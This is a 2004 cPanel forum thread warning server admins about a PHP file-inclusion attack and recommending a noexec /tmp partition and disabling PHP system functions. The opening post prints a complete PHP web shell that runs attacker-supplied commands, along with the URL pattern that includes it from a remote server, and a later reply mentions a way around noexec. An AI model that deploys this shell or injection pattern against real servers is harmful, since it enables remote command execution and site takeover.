Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Secure your /tmp partitions!

Discussion in 'General Discussion' started by amdmachine, Mar 15, 2004.

  1. amdmachine

    amdmachine Member

    Joined:
    Feb 20, 2003
    Messages:
    17
    Likes Received:
    0
    Trophy Points:
    151
    Secure your /tmp and /var/tmp partitions people. Seems like a php injection exploit is now floating around which is very easy to use and exploit on a website that allows php files to be called locally.

    Code: hack.php
    Code:
    <br><font face="verdana" size="2"><center><bCOMMAND BUG PHP EXPLOIT !!</b><br></center></font><font face="Verdana" size="1"></center><br>
    <b>#</b> COMMAND BUG PHP EXPLOIT !!: <br>
    <b>#</b>Created By : <b>F4lcon16</b><br>
    <br>#</b>Email: <b>F4lcon16@linuxmail.org</b><br>
    <br>
    <hr color="black" width=751px height=115px>
    <br>
    <pre><font face="Verdana" size="1">
    <?
      // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
      if (isset($chdir)) @chdir($chdir);
      ob_start();
      system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
      $output = ob_get_contents();
      ob_end_clean();
      if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
    ?>
    </font></pre>
    <br>
    <hr color="black" width=751px height=115px>
    <br>
    <font face="Verdana" size="1"><b># F4lcon16</b><br><b>@ </b>f4lcon16@linuxmail.org<br><b># </b>
    It's called remotely like this:
    Code:
    http://yoursite.onyourserver.com/index.php=http://remote.server.com/hack.php?&cmd=shell%20commands%20here
    A correctly configured partition setup (not allowing executive permissions on /tmp) will stop scripts for being executed.
     
  2. nickn

    nickn Well-Known Member
    PartnerNOC

    Joined:
    Jun 15, 2003
    Messages:
    619
    Likes Received:
    1
    Trophy Points:
    168
    Just for those who aren't sure how...

    With cPanel it's as easy as running /scripts/securetmp
     
  3. InternetPEI

    InternetPEI Well-Known Member

    Joined:
    May 26, 2003
    Messages:
    102
    Likes Received:
    0
    Trophy Points:
    166
    Thanks :)
     
  4. Jeewhizz

    Jeewhizz Well-Known Member

    Joined:
    Mar 12, 2003
    Messages:
    51
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    London, England
    You should also be disabling certina functions like system and exec in php as default ;)
     
  5. hostultra

    hostultra Well-Known Member

    Joined:
    Aug 21, 2002
    Messages:
    167
    Likes Received:
    0
    Trophy Points:
    166
    The noexec thing on /tmp does mean you are invulnerable
    They can still run "sh /tmp/whatever" and it will execute
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. nickn

    nickn Well-Known Member
    PartnerNOC

    Joined:
    Jun 15, 2003
    Messages:
    619
    Likes Received:
    1
    Trophy Points:
    168
    It's not perfect, but it's better than nothing.
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice